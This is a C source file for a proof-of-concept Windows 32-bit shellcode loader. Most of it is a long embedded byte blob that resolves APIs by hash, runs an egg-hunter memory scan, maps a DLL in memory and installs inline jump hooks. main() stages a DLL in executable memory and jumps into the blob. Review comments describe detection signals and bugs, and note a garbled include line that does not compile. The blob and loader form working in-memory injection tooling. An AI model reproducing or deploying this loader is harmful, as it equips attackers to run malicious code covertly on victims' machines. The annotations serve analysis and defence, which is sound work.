/*
 * Proof-of-concept shellcode loader (Windows, 32-bit x86).
 *
 * main() stages a DLL image in one RWX allocation behind a small header and
 * then transfers control to the embedded byte blob `shellcode`, which is
 * expected to find that region by scanning memory and act on it.
 *
 * NOTE(review): the three #include directives on the next line lost their
 * header names during extraction and survive as a bare
 * "#include #include #include"; that line does not compile as written.
 * The identifiers used below (HANDLE/CreateFile/VirtualAlloc, printf,
 * strcpy/strlen) suggest <windows.h>, <stdio.h> and <string.h> -- confirm
 * against the original file rather than assuming.
 */
#include #include #include

/*
 * Embedded x86 (32-bit) machine code.  What can be read straight off the
 * bytes, without executing anything:
 *
 *   - "\x55\x8b\xec" (push ebp / mov ebp,esp) prologues, "\xcc" padding and
 *     the MSVC security-cookie idiom "\xa1\x2c\xd0\x40\x00\x33\xc5\x89\x45\xfc"
 *     recur throughout, so this looks like compiler-generated code with
 *     absolute 0x0040xxxx addresses rather than hand-written
 *     position-independent shellcode; the "mov ... / sub ..." pairs such as
 *     "\xb8\xe0\x11\x40\x00\x2d\xd0\x11\x40\x00" presumably re-base those
 *     addresses -- not verified here.
 *   - "\x33\xc0\x64\x8b\x40\x30" (xor eax,eax / mov eax,fs:[eax+0x30])
 *     reads the PEB, the usual start of an API-by-hash resolver.
 *   - In the last quarter of the blob the run
 *     "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
 *     followed by "\xb8\x90\x07\x33\x31\x8b\xfa\xaf\x75\xea\xaf\x75\xe7" is
 *     the well-known int 0x2e egg-hunter memory scan.  Its 4-byte tag is
 *     0x31330790, checked twice in a row -- exactly the DWORD that main()
 *     writes twice at the start of the staging buffer.  That pairing is the
 *     contract between the loader and the blob.
 *   - Shortly before that, "\xc6\x45\xd4\x49 ... \x6e ... \x69 ... \x74 ...
 *     \x00" assembles the string "Init" on the stack; presumably an export
 *     name looked up later, but that is inference, not verified.
 *
 * Detection / defence angle: the observable behaviour of this program is an
 * RWX VirtualAlloc sized from a file, a ReadFile straight into that region,
 * a memory-scanning loop driven by int 0x2e, and a call into a writable
 * global array.  Each of those is a standard memory-scanner / EDR signal.
 * Because `shellcode` is ordinary non-const data, DEP/NX makes the
 * `dllLoad()` call in main() fault unless the build marks .data executable.
 */
unsigned char shellcode[] =
    "\x55\x8b\xec\x81\xec\xa0\x01\x00\x00\xa1\x2c\xd0\x40\x00\x33\xc5\x89\x45\xfc\x53\x56"
    "\x57\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x83\xeb\x1f\x89\x9d\x68\xff\xff\xff"
    /* PEB read (fs:[0x30]) begins in the next segment */
    "\x89\xbd\x60\xfe\xff\xff\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b"
    "\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c"
    "\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b"
    "\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0"
    "\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd"
    "\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3"
    "\xe8\x8b\xff\xff\xff\x8b\xd8\x68\x8e\x4e\x0e\xec\x53\xe8\xa0\xff\xff\xff\x83\xc4"
    "\x08\x89\x45\xbc\x68\xaa\xfc\x0d\x7c\x53\xe8\x8f\xff\xff\xff\x83\xc4\x08\x89\x45"
    "\xc0\x68\x7e\xd8\xe2\x73\x53\xe8\x7e\xff\xff\xff\x83\xc4\x08\x89\x45\xc4\x68\x54"
    "\xca\xaf\x91\x53\xe8\x6d\xff\xff\xff\x83\xc4\x08\x89\x45\xc8\x68\xac\x33\x06\x03"
    "\x53\xe8\x5c\xff\xff\xff\x83\xc4\x08\x89\x45\xcc\x68\xaa\xc8\xc8\xa3\x53\xe8\x4b"
    "\xff\xff\xff\x83\xc4\x08\x89\x45\xd0\x68\x1b\xc6\x46\x79\x53\xe8\x3a\xff\xff\xff"
    "\x83\xc4\x08\x89\x45\xd4\x68\x80\x09\x12\x53\x53\xe8\x29\xff\xff\xff\x83\xc4\x08"
    "\x89\x45\xd8\x68\xa1\x6a\x3d\xd8\x53\xe8\x18\xff\xff\xff\x83\xc4\x08\x89\x45\xdc"
    /* "\xb0\x6c\x50\x68\x6e\x74\x64\x6c\x54" pushes the bytes of "ntdll" and its address */
    "\x33\xc0\xb0\x6c\x50\x68\x6e\x74\x64\x6c\x54\xff\x55\xbc\x8b\xd8\x68\x95\xdd\xb5"
    "\x92\x53\xe8\xf7\xfe\xff\xff\x83\xc4\x08\x89\x45\xa8\x68\x90\x78\x4a\x49\x53\xe8"
    "\xe6\xfe\xff\xff\x83\xc4\x08\x89\x45\xac\x68\xb8\x74\x29\x85\x53\xe8\xd5\xfe\xff"
    "\xff\x83\xc4\x08\x89\x45\xb0\x68\xcb\x9b\xb2\x5b\x53\xe8\xc4\xfe\xff\xff\x83\xc4"
    "\x08\x89\x45\xb4\x68\x94\x9b\x15\xd5\x53\xe8\xb3\xfe\xff\xff\x83\xc4\x08\x89\x45"
    "\xb8\x8d\x85\x60\xfe\xff\xff\x50\xe8\xae\x07\x00\x00\x83\xc4\x04\x5f\x5e\x5b\x8b"
    "\x4d\xfc\x33\xcd\xe8\x85\x0a\x00\x00\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc"
    "\xcc\xcc\xcc\xff\xff\xff\xff\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55"
    "\x8b\xec\xe8\x00\x00\x00\x00\x59\x83\xe9\x08\xb8\xe0\x11\x40\x00\x2d\xd0\x11\x40"
    "\x00\x2b\xc8\x8b\x01\x5d\xc3\xcc\xcc\xcc\xcc\x55\x8b\xec\x83\xec\x08\xc7\x45\xfc"
    "\x00\x00\x00\x00\xeb\x09\x8b\x45\xfc\x83\xc0\x01\x89\x45\xfc\x8b\x4d\x0c\x0f\xb7"
    "\x11\x39\x55\xfc\x7d\x56\xc7\x45\xf8\x00\x00\x00\x00\xeb\x09\x8b\x45\xf8\x83\xc0"
    "\x01\x89\x45\xf8\x8b\x4d\x08\x8b\x55\xf8\x3b\x91\x04\x01\x00\x00\x7d\x22\x8b\x45"
    "\xfc\x03\x45\xf8\x8b\x4d\x0c\x8b\x51\x04\x0f\xb7\x04\x42\x8b\x4d\x08\x03\x4d\xf8"
    "\x0f\xbe\x51\x04\x3b\xc2\x74\x02\xeb\x02\xeb\xc7\x8b\x45\x08\x8b\x4d\xf8\x3b\x88"
    "\x04\x01\x00\x00\x75\x04\x33\xc0\xeb\x07\xeb\x96\xb8\x01\x00\x00\x00\x8b\xe5\x5d"
    "\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x51\xe8"
    "\x47\xff\xff\xff\x89\x45\xfc\x8b\x45\x10\x8b\x48\x08\x51\x8b\x55\xfc\x52\xe8\x54"
    "\xff\xff\xff\x83\xc4\x08\x85\xc0\x75\x12\x8b\x45\x08\x8b\x4d\xfc\x8b\x91\x10\x01"
    "\x00\x00\x89\x10\x33\xc0\xeb\x17\x8b\x45\x10\x50\x8b\x4d\x0c\x51\x8b\x55\x08\x52"
    "\x8b\x45\xfc\x8b\x88\x80\x01\x00\x00\xff\xd1\x8b\xe5\x5d\xc2\x0c\x00\xcc\xcc\xcc"
    "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x51\xe8\xe7\xfe\xff\xff"
    "\x89\x45\xfc\x8b\x45\x08\x8b\x48\x08\x51\x8b\x55\xfc\x52\xe8\xf4\xfe\xff\xff\x83"
    "\xc4\x08\x85\xc0\x75\x5d\x8b\x45\x0c\xc7\x00\xe0\x5c\x27\x7e\x8b\x4d\x0c\xc7\x41"
    "\x04\xfa\x22\xc4\x01\x8b\x55\x0c\xc7\x42\x08\xe0\x5c\x27\x8e\x8b\x45\x0c\xc7\x40"
    "\x0c\xfa\x22\xc4\x01\x8b\x4d\x0c\xc7\x41\x10\xe0\x5c\x27\x7e\x8b\x55\x0c\xc7\x42"
    "\x14\xfa\x22\xc4\x01\x8b\x45\x0c\xc7\x40\x18\xe0\x5c\x27\x7e\x8b\x4d\x0c\xc7\x41"
    "\x1c\xfa\x22\xc4\x01\x8b\x55\x0c\xc7\x42\x20\x80\x00\x00\x00\x33\xc0\xeb\x13\x8b"
    "\x45\x0c\x50\x8b\x4d\x08\x51\x8b\x55\xfc\x8b\x82\x84\x01\x00\x00\xff\xd0\x8b\xe5"
    "\x5d\xc2\x08\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x51\xe8\x47\xfe\xff\xff"
    "\x89\x45\xfc\x8b\x45\x10\x8b\x48\x08\x51\x8b\x55\xfc\x52\xe8\x54\xfe\xff\xff\x83"
    "\xc4\x08\x85\xc0\x75\x10\x8b\x45\x08\x8b\x4d\xfc\x8b\x91\x10\x01\x00\x00\x89\x10"
    "\xeb\x23\x8b\x45\x1c\x50\x8b\x4d\x18\x51\x8b\x55\x14\x52\x8b\x45\x10\x50\x8b\x4d"
    "\x0c\x51\x8b\x55\x08\x52\x8b\x45\xfc\x8b\x88\x88\x01\x00\x00\xff\xd1\x8b\xe5\x5d"
    "\xc2\x18\x00\xcc\xcc\xcc\xcc\x55\x8b\xec\x51\xe8\xe7\xfd\xff\xff\x89\x45\xfc\x8b"
    "\x45\xfc\x8b\x4d\x20\x3b\x88\x10\x01\x00\x00\x75\x12\x8b\x55\x08\x8b\x45\xfc\x8b"
    "\x88\x10\x01\x00\x00\x89\x0a\x33\xc0\xeb\x27\x8b\x55\x20\x52\x8b\x45\x1c\x50\x8b"
    "\x4d\x18\x51\x8b\x55\x14\x52\x8b\x45\x10\x50\x8b\x4d\x0c\x51\x8b\x55\x08\x52\x8b"
    "\x45\xfc\x8b\x88\x8c\x01\x00\x00\xff\xd1\x8b\xe5\x5d\xc2\x1c\x00\xcc\xcc\xcc\xcc"
    "\xcc\xcc\xcc\x55\x8b\xec\x51\xe8\x87\xfd\xff\xff\x89\x45\xfc\x8b\x45\xfc\x8b\x4d"
    "\x08\x3b\x88\x10\x01\x00\x00\x75\x12\x8b\x55\x10\x8b\x45\xfc\x8b\x88\x10\x01\x00"
    "\x00\x89\x0a\x33\xc0\xeb\x33\x8b\x55\x2c\x52\x8b\x45\x28\x50\x8b\x4d\x24\x51\x8b"
    "\x55\x20\x52\x8b\x45\x1c\x50\x8b\x4d\x18\x51\x8b\x55\x14\x52\x8b\x45\x10\x50\x8b"
    "\x4d\x0c\x51\x8b\x55\x08\x52\x8b\x45\xfc\x8b\x88\x90\x01\x00\x00\xff\xd1\x8b\xe5"
    "\x5d\xc2\x28\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x83\xec"
    "\x28\xc7\x45\xd8\x05\x00\x00\x00\x8d\x45\xdc\x50\x8b\x4d\xd8\x51\x8b\x55\x0c\x52"
    "\x8b\x45\x10\x50\x6a\xff\x8b\x4d\x08\x8b\x91\x7c\x01\x00\x00\xff\xd2\x8b\x45\x10"
    "\x03\x45\xd8\xc6\x00\xe9\x8b\x4d\x10\x83\xc1\x05\x8b\x55\x0c\x2b\xd1\x8b\x45\x10"
    "\x03\x45\xd8\x89\x50\x01\x6a\x1c\x8d\x4d\xe4\x51\x8b\x55\x0c\x52\x8b\x45\x08\x8b"
    "\x88\x70\x01\x00\x00\xff\xd1\x8d\x55\xf8\x52\x6a\x40\x8b\x45\xf0\x50\x8b\x4d\xe4"
    "\x51\x8b\x55\x08\x8b\x82\x74\x01\x00\x00\xff\xd0\x8b\x4d\x0c\xc6\x01\xe9\x8b\x55"
    "\x0c\x83\xc2\x05\x8b\x45\x14\x2b\xc2\x8b\x4d\x0c\x89\x41\x01\x8d\x55\xe0\x52\x8b"
    "\x45\xf8\x50\x8b\x4d\xf0\x51\x8b\x55\xe4\x52\x8b\x45\x08\x8b\x88\x74\x01\x00\x00"
    "\xff\xd1\x8b\x55\xf0\x52\x8b\x45\xe4\x50\x6a\xff\x8b\x4d\x08\x8b\x91\x78\x01\x00"
    "\x00\xff\xd2\x8b\xe5\x5d\xc3\x55\x8b\xec\xb8\x50\x14\x40\x00\x2d\x00\x10\x40\x00"
    "\x8b\x4d\x08\x03\x81\x08\x01\x00\x00\x50\x8b\x55\x08\x81\xc2\x3c\x01\x00\x00\x52"
    "\x8b\x45\x08\x8b\x88\x58\x01\x00\x00\x51\x8b\x55\x08\x52\xe8\x0c\xff\xff\xff\x83"
    "\xc4\x10\x8b\x45\x08\x05\x3c\x01\x00\x00\x8b\x4d\x08\x89\x81\x90\x01\x00\x00\xba"
    "\xf0\x12\x40\x00\x81\xea\x00\x10\x40\x00\x8b\x45\x08\x03\x90\x08\x01\x00\x00\x52"
    "\x8b\x4d\x08\x81\xc1\x1e\x01\x00\x00\x51\x8b\x55\x08\x8b\x82\x4c\x01\x00\x00\x50"
    "\x8b\x4d\x08\x51\xe8\xc6\xfe\xff\xff\x83\xc4\x10\x8b\x55\x08\x81\xc2\x1e\x01\x00"
    "\x00\x8b\x45\x08\x89\x90\x84\x01\x00\x00\xb9\x90\x13\x40\x00\x81\xe9\x00\x10\x40"
    "\x00\x8b\x55\x08\x03\x8a\x08\x01\x00\x00\x51\x8b\x45\x08\x05\x28\x01\x00\x00\x50"
    "\x8b\x4d\x08\x8b\x91\x50\x01\x00\x00\x52\x8b\x45\x08\x50\xe8\x80\xfe\xff\xff\x83"
    "\xc4\x10\x8b\x4d\x08\x81\xc1\x28\x01\x00\x00\x8b\x55\x08\x89\x8a\x88\x01\x00\x00"
    "\xb8\xf0\x13\x40\x00\x2d\x00\x10\x40\x00\x8b\x4d\x08\x03\x81\x08\x01\x00\x00\x50"
    "\x8b\x55\x08\x81\xc2\x32\x01\x00\x00\x52\x8b\x45\x08\x8b\x88\x54\x01\x00\x00\x51"
    "\x8b\x55\x08\x52\xe8\x3a\xfe\xff\xff\x83\xc4\x10\x8b\x45\x08\x05\x32\x01\x00\x00"
    "\x8b\x4d\x08\x89\x81\x8c\x01\x00\x00\xba\x90\x12\x40\x00\x81\xea\x00\x10\x40\x00"
    "\x8b\x45\x08\x03\x90\x08\x01\x00\x00\x52\x8b\x4d\x08\x81\xc1\x14\x01\x00\x00\x51"
    "\x8b\x55\x08\x8b\x82\x48\x01\x00\x00\x50\x8b\x4d\x08\x51\xe8\xf4\xfd\xff\xff\x83"
    "\xc4\x10\x8b\x55\x08\x81\xc2\x14\x01\x00\x00\x8b\x45\x08\x89\x90\x80\x01\x00\x00"
    "\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x83\xec"
    "\x28\xc7\x45\xd8\x05\x00\x00\x00\x6a\x1c\x8d\x45\xe4\x50\x8b\x4d\x0c\x51\x8b\x55"
    "\x08\x8b\x82\x70\x01\x00\x00\xff\xd0\x8d\x4d\xf8\x51\x6a\x40\x8b\x55\xf0\x52\x8b"
    "\x45\xe4\x50\x8b\x4d\x08\x8b\x91\x74\x01\x00\x00\xff\xd2\x8d\x45\xdc\x50\x8b\x4d"
    "\xd8\x51\x8b\x55\x10\x52\x8b\x45\x0c\x50\x6a\xff\x8b\x4d\x08\x8b\x91\x7c\x01\x00"
    "\x00\xff\xd2\x8d\x45\xe0\x50\x8b\x4d\xf8\x51\x8b\x55\xf0\x52\x8b\x45\xe4\x50\x8b"
    "\x4d\x08\x8b\x91\x74\x01\x00\x00\xff\xd2\x8b\x45\xf0\x50\x8b\x4d\xe4\x51\x6a\xff"
    "\x8b\x55\x08\x8b\x82\x78\x01\x00\x00\xff\xd0\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\x55"
    "\x8b\xec\x8b\x45\x08\x05\x3c\x01\x00\x00\x50\x8b\x4d\x08\x8b\x91\x58\x01\x00\x00"
    "\x52\x8b\x45\x08\x50\xe8\x51\xff\xff\xff\x83\xc4\x0c\x8b\x4d\x08\x81\xc1\x1e\x01"
    "\x00\x00\x51\x8b\x55\x08\x8b\x82\x4c\x01\x00\x00\x50\x8b\x4d\x08\x51\xe8\x31\xff"
    "\xff\xff\x83\xc4\x0c\x8b\x55\x08\x81\xc2\x28\x01\x00\x00\x52\x8b\x45\x08\x8b\x88"
    "\x50\x01\x00\x00\x51\x8b\x55\x08\x52\xe8\x11\xff\xff\xff\x83\xc4\x0c\x8b\x45\x08"
    "\x05\x32\x01\x00\x00\x50\x8b\x4d\x08\x8b\x91\x54\x01\x00\x00\x52\x8b\x45\x08\x50"
    "\xe8\xf2\xfe\xff\xff\x83\xc4\x0c\x8b\x4d\x08\x81\xc1\x14\x01\x00\x00\x51\x8b\x55"
    "\x08\x8b\x82\x48\x01\x00\x00\x50\x8b\x4d\x08\x51\xe8\xd2\xfe\xff\xff\x83\xc4\x0c"
    "\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55\x8b\xec\x83\xec"
    "\x10\x8b\x45\x08\x8b\x88\x0c\x01\x00\x00\x89\x4d\xf0\x8b\x55\x08\x8b\x82\x0c\x01"
    "\x00\x00\x8b\x4d\xf0\x03\x41\x3c\x89\x45\xfc\x6a\x40\x68\x00\x30\x00\x00\x8b\x55"
    "\xfc\x8b\x42\x50\x50\x8b\x4d\xfc\x8b\x51\x34\x52\x8b\x45\x08\x8b\x88\x68\x01\x00"
    "\x00\xff\xd1\x8b\x55\x08\x89\x82\x10\x01\x00\x00\x8b\x45\x08\x83\xb8\x10\x01\x00"
    "\x00\x00\x75\x24\x6a\x40\x68\x00\x30\x00\x00\x8b\x4d\xfc\x8b\x51\x50\x52\x6a\x00"
    "\x8b\x45\x08\x8b\x88\x68\x01\x00\x00\xff\xd1\x8b\x55\x08\x89\x82\x10\x01\x00\x00"
    "\x6a\x00\x8b\x45\xfc\x8b\x48\x54\x51\x8b\x55\x08\x8b\x82\x0c\x01\x00\x00\x50\x8b"
    "\x4d\x08\x8b\x91\x10\x01\x00\x00\x52\x6a\xff\x8b\x45\x08\x8b\x88\x7c\x01\x00\x00"
    "\xff\xd1\x8b\x55\xfc\x0f\xb7\x42\x14\x8b\x4d\xfc\x8d\x54\x01\x18\x89\x55\xf4\xc7"
    "\x45\xf8\x00\x00\x00\x00\xeb\x09\x8b\x45\xf8\x83\xc0\x01\x89\x45\xf8\x8b\x4d\xfc"
    "\x0f\xb7\x51\x06\x39\x55\xf8\x7d\x4d\x6a\x00\x8b\x45\xf8\x6b\xc0\x28\x8b\x4d\xf4"
    "\x8b\x54\x01\x10\x52\x8b\x45\xf8\x6b\xc0\x28\x8b\x4d\x08\x8b\x91\x0c\x01\x00\x00"
    "\x8b\x4d\xf4\x03\x54\x01\x14\x52\x8b\x55\xf8\x6b\xd2\x28\x8b\x45\x08\x8b\x88\x10"
    "\x01\x00\x00\x8b\x45\xf4\x03\x4c\x10\x0c\x51\x6a\xff\x8b\x4d\x08\x8b\x91\x7c\x01"
    "\x00\x00\xff\xd2\xeb\x9e\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\x55"
    /* next two segments: "Init" is written byte by byte to the stack, then the
       int 0x2e egg hunter ("\x66\x81\xca\xff\x0f ... \xaf\x75\xe7") scans for
       the tag 0x31330790 that main() stores at the head of the staging buffer */
    "\x8b\xec\x83\xec\x34\xa1\x2c\xd0\x40\x00\x33\xc5\x89\x45\xe0\x56\x57\xc6\x45\xd4"
    "\x49\xc6\x45\xd5\x6e\xc6\x45\xd6\x69\xc6\x45\xd7\x74\xc6\x45\xd8\x00\x66\x81\xca"
    "\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x90\x07\x33\x31\x8b"
    "\xfa\xaf\x75\xea\xaf\x75\xe7\x8b\x07\x89\x45\xec\x8d\x47\x04\x89\x45\xe8\x6a\x04"
    "\x68\x00\x10\x00\x00\x8b\x45\xec\x50\x6a\x00\x8b\x4d\x08\x8b\x91\x68\x01\x00\x00"
    "\xff\xd2\x8b\x4d\x08\x89\x81\x0c\x01\x00\x00\x8b\x55\x08\x83\xba\x0c\x01\x00\x00"
    "\x00\x75\x0d\x6a\x01\x8b\x45\x08\x8b\x88\x64\x01\x00\x00\xff\xd1\x8b\x55\x08\x8b"
    "\x82\x0c\x01\x00\x00\x89\x45\xcc\x8b\x4d\xec\x8b\x7d\xcc\x8b\x75\xe8\xf3\xa4\xc7"
    "\x45\xf4\x00\x00\x00\x00\xeb\x09\x8b\x4d\xf4\x83\xc1\x01\x89\x4d\xf4\x8b\x55\x08"
    "\x8b\x82\x0c\x01\x00\x00\x8b\x4d\xf4\x0f\xbe\x14\x08\x85\xd2\x74\x1a\x8b\x45\x08"
    "\x8b\x88\x0c\x01\x00\x00\x8b\x55\x08\x03\x55\xf4\x8b\x45\xf4\x8a\x0c\x01\x88\x4a"
    "\x04\xeb\xc9\x8b\x55\x08\x03\x55\xf4\xc6\x42\x04\x00\x8b\x45\x08\x8b\x4d\xf4\x89"
    "\x88\x04\x01\x00\x00\x8b\x55\x08\x8b\x82\x0c\x01\x00\x00\x8b\x4d\xf4\x8d\x54\x01"
    "\x01\x8b\x45\x08\x89\x90\x0c\x01\x00\x00\x8b\x4d\x08\x51\xe8\xb8\xfd\xff\xff\x83"
    "\xc4\x04\xba\xd0\x11\x40\x00\x81\xea\x00\x10\x40\x00\x8b\x45\x08\x8b\x88\x08\x01"
    "\x00\x00\x8b\x45\x08\x89\x04\x0a\x8b\x4d\x08\x51\xe8\xe2\xfa\xff\xff\x83\xc4\x04"
    "\x8b\x55\x08\x83\xc2\x04\x52\x8b\x45\x08\x8b\x88\x5c\x01\x00\x00\xff\xd1\x89\x45"
    "\xf0\x83\x7d\xf0\x00\x75\x0d\x6a\x01\x8b\x55\x08\x8b\x82\x64\x01\x00\x00\xff\xd0"
    "\x8b\x4d\x08\x51\xe8\xae\xfc\xff\xff\x83\xc4\x04\x8d\x55\xd4\x52\x8b\x45\xf0\x50"
    "\x8b\x4d\x08\x8b\x91\x60\x01\x00\x00\xff\xd2\x89\x45\xfc\x83\x7d\xfc\x00\x74\x0c"
    "\x8b\x45\x08\x8b\x08\x51\xff\x55\xfc\x83\xc4\x04\x68\x00\x80\x00\x00\x6a\x00\x8b"
    "\x55\x08\x8b\x45\x08\x8b\x8a\x0c\x01\x00\x00\x2b\x88\x04\x01\x00\x00\x83\xe9\x01"
    "\x51\x8b\x55\x08\x8b\x82\x6c\x01\x00\x00\xff\xd0\x6a\x00\x8b\x4d\x08\x8b\x91\x64"
    "\x01\x00\x00\xff\xd2\xc7\x45\x08\x00\x00\x00\x00\x33\xc0\x5f\x5e\x8b\x4d\xe0\x33"
    "\xcd\xe8\x00\x01\x00\x00\x8b\xe5\x5d\xc3\xcc\xcc\xcc\xcc\xcc";

/* The blob is entered through this pointer type; no arguments are passed
   and the empty parameter list is unprototyped (pre-C23 "()"). */
typedef BOOL (WINAPI *runShellcode)();

/*
 * Entry point.
 *
 * Lays out, in a single RWX allocation, the structure the blob scans for:
 *   [0..3]   tag 0x31330790
 *   [4..7]   tag 0x31330790 again (the egg hunter checks it twice)
 *   [8..11]  dllSize
 *   [12..]   dllName, NUL-terminated
 *   after    the raw bytes of the file that was opened
 * and then calls into `shellcode`.  argc/argv are unused.
 *
 * Returns 0 after the blob returns, 1 if any Win32 call fails.  The blob's
 * own return value is ignored.
 *
 * NOTE(review) -- points a reader should not gloss over:
 *   - dllName is "symtex.dll" but the file opened is "this_dll.dll", so the
 *     name stored in the header is not the file whose bytes follow it;
 *     presumably a leftover from another test build -- unverified.
 *   - OPEN_ALWAYS creates the file when it is absent, so a missing DLL
 *     produces a zero-length read instead of an error; OPEN_EXISTING is
 *     the flag that reports the failure.
 *   - safeDllBase is a ULONG that receives VirtualAlloc's LPVOID without a
 *     cast; that only round-trips on a 32-bit build (consistent with the
 *     x86 blob) and truncates the pointer on x64.
 *   - bytesRead is never compared with dllSize, so a short read leaves the
 *     tail of the image uninitialised yet still mapped executable.
 *   - The RWX region is never released with VirtualFree; only the file
 *     handle is closed on every path.
 *   - mapHandle and byteCounter are declared but never used.
 */
int main(int argc, char **argv){
    char dllName[] = "symtex.dll";
    HANDLE dllHandle, mapHandle;        /* mapHandle: unused */
    ULONG safeDllBase;                  /* integer holding a pointer, see note above */
    DWORD dllSize;
    ULONG byteCounter = 0;              /* unused */
    DWORD bytesRead = 0;
    runShellcode dllLoad = shellcode;   /* data pointer converted to function pointer */

    /* OPEN_ALWAYS: a missing file is created empty rather than reported. */
    if((dllHandle=CreateFile("this_dll.dll", GENERIC_READ, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) == INVALID_HANDLE_VALUE){
        printf("[*] createfile failed\n");
        return 1;
    }
    if((dllSize = GetFileSize(dllHandle, NULL)) == INVALID_FILE_SIZE){
        printf("[*] getfilesize failed\n");
        CloseHandle(dllHandle);
        return 1;
    }
    /* Header (12 bytes) + name + NUL + image, all in one RWX region --
       the single most visible signal this program gives a memory scanner. */
    if(!(safeDllBase = VirtualAlloc(NULL, dllSize+12+strlen(dllName)+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE))){
        printf("[*] virtualalloc failed\n");
        CloseHandle(dllHandle);
        return 1;
    }
    /* Two copies of the tag: the egg hunter in the blob matches it twice. */
    *(LPDWORD)safeDllBase = 0x31330790;
    *(LPDWORD)(safeDllBase+4) = 0x31330790;
    *(LPDWORD)(safeDllBase+8) = dllSize;
    /* Fits by construction: the allocation reserved strlen(dllName)+1 for it. */
    strcpy((char *)(safeDllBase+12), dllName);
    /* bytesRead is only an out-parameter here; it is not checked against dllSize. */
    if(!ReadFile(dllHandle, (LPVOID)(safeDllBase+12+strlen(dllName)+1), dllSize, &bytesRead, NULL)){
        printf("[*] readfile failed\n");
        CloseHandle(dllHandle);
        return 1;
    }
    CloseHandle(dllHandle);
    /* Jumps into the writable global array; faults under DEP/NX unless
       the build makes .data executable. */
    dllLoad();
    return 0;
}